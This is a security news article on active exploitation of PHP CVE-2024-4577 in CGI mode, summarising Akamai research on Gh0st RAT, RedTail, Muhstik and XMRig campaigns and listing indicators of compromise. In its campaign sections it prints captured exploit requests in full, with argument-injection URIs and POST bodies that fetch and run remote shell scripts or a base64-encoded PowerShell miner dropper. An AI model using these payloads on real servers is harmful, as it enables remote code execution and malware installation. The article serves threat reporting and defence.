Malware

Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild

A critical vulnerability in PHP, tracked as CVE-2024-4577, is being actively exploited by threat actors in wild just days after its public disclosure in June 2024. The flaw affects PHP installations running in CGI mode, primarily on Windows systems using Chinese and Japanese language locales, though it may impact a wider range of setups.

The Akamai Security Intelligence Response Team (SIRT) has detected numerous exploit attempts targeting this vulnerability within 24 hours of its disclosure. The ease of exploitation has led to quick adoption by various threat actors.

“One of the factors in determining criticality is the ease of exploitation, and this one is pretty uncomplicated for a threat actor to execute. To achieve RCE, an attacker just needs to send PHP code to the server and have it be (mis)interpreted.” Akamai said.

"Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!"- Free Demo

Malware Campaigns Leveraging the Flaw

Akamai researchers have observed the flaw being abused in multiple malware campaigns, including:

Gh0st RAT: A 15-year-old remote access tool was used in attacks originating from a server in Germany. The malware renamed itself and beaconed out to a command-and-control server.
RedTail Cryptominer: A cryptomining operation was detected abusing the vulnerability to retrieve and execute a shell script that downloads an x86 RedTail cryptomining malware.
Muhstik Malware: Another campaign downloaded a variant of Muhstik malware, which targets IoT devices and Linux servers for cryptomining and DDoS purposes.
XMRig: PowerShell was used to download and execute a script that spins up the XMRig cryptominer from a remote mining pool.

Within 24 hours of disclosure, SIRT observed Gh0st RAT malware attempts targeting this vulnerability. The malware, a UPX-packed Windows executable, beacons out to a Germany-based command and control server and renames itself to evade detection.

RedTail Cryptominer

SIRT honeypots detected a RedTail cryptomining operation exploiting CVE-2024-4577. The attacker used a shell script to download and execute the cryptomining malware from a Russia-based IP address.

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0



URI:
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

POST DATA:
<?php shell_exec("SC=\$(wget -O- http://185.172.128[.]93/sh || curl http://185.172.128[.]93/sh); echo \"\$SC\" | sh -s cve_2024_4577"); ?>

Muhstik Malware

Another campaign involved a shell script downloading Muhstik malware, which targets Internet of Things and Linux servers for cryptomining and distributed denial-of-service (DDoS) attacks.

User-Agent: python-requests/2.22

URI:
/?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input

POST DATA:
<?php system('curl 86.48.2[.]49/3sh')?>;echo 1337; die;

XMRig

A fourth campaign involved XMRig, where PowerShell commands were used to download and execute a script to spin up the cryptominer from a remote mining pool.

URI:
/test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
 
POST DATA (Base64 Encoded):
<?php $cmd=base64_decode('cG93ZXJzaGVsbCAtQ29tbWFuZCAiJHdjID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsgJHRlbXBmaWxlID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcEZpbGVOYW1lKCk7ICR0ZW1wZmlsZSArPSAnLmJhdCc7ICR3Yy5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9kb3dubG9hZC5jM3Bvb2wub3JnL3htcmlnX3NldHVwL3Jhdy9tYXN0ZXIvc2V0dXBfYzNwb29sX21pbmVyLmJhdCcsICR0ZW1wZmlsZSk7ICYgJHRlbXBmaWxlIDQ5dzhnc0x3N1V3VVZzelVCdFl1amROMU1jTmtvZVl1Y1RjdGFlUFg4bm1iaktBQnpKOVMxcmlnV2RoNUVpVVQxejROUEFQY2h4VDdSYUpYTjNmVVJVcE02RjZLR2p5OyBSZW1vdmUtSXRlbSAtRm9yY2UgJHRlbXBmaWxlIg==');system($cmd) ?> 

POST DATA (Base64 Decoded):
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile"

Mitigations Recommended

Akamai advises affected organizations to patch their systems swiftly and monitor for indicators of compromise (IOCs).

Those using manual mode should ensure the Command Injection Attack group or specific relevant rules are set to “Deny” mode. Akamai has observed a surge in scanning for this vulnerability and is continuing to monitor the situation closely.

Join our free webinar to learn about combating slow DDoS attacks, a major threat today.

Indicators of compromise for SOC/DFIR Teams

Gh0st RAT

SHA256 hash

A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e

File names

A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e.exe
phps.exe
Iqgqosc.exe

IPv4 addresses

147.50.253[.]109
146.19.100[.]7
23.237.182[.]122

BangCloud linked IOCs with hits on VirusTotal

147.50.253[.]220
147.50.253[.]222
147.50.253[.]225
147.50.253[.]219
147.50.253[.]231
147.50.253[.]99
147.50.253[.]100
147.50.253[.]228
147.50.253[.]5
147.50.253[.]4
154.197.12[.].156
147.50.253[.]110
147.50.253[.]102
147.50.253[.]218
147.50.253[.]23
147.50.253[.]11
147.50.253[.]163
147.50.253[.]2
147.50.253[.]116
147.50.253[.]18
147.50.253[.]109
147.50.253[.]106
147.50.253[.]112
147.50.253[.]111
147.50.253[.]7
147.50.253[.]104
147.50.253[.]167
147.50.253[.]119
147.50.253[.]113
147.50.253[.]103
147.50.253[.]107
147.50.253[.]105
147.50.253[.]114
147.50.253[.]108
147.50.253[.]101
147.50.253[.]117
147.50.253[.]115
147.50.229[.]12

MITRE ATT&CK techniques

T1091 — Replication Through Removable Media
T1547 — Boot or Logon Autostart Execution
T1056 — Input Capture
T1112 — Modify Registry
T1003 — OS Credential Dumping
T1120 — Peripheral Device Discovery
T1027 — Obfuscated Files or Information
T1071 — Application Layer Protocol
T1082 — System Information Discovery
T1571 — Non-Standard Port
T1057 — Process Discovery

RedTail

IPv4 addresses

185.172.128[.]93

SHA256 hashes

2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
0d70a044732a77957eaaf28d9574d75da54ae430d8ad2e4049bd182e13967a6f
ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
9753df3ea4b9948c82310f64ff103685f78af85e3e08bb5f0d0d44047c63c315
19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d

Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.